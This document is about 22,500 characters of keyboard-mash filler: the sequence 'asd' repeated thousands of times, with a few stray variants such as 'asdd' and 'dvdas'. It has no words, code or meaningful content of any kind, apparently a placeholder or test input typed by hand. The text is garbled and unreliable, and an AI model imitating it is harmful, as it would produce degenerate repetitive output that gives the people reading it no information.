asdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdvdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasd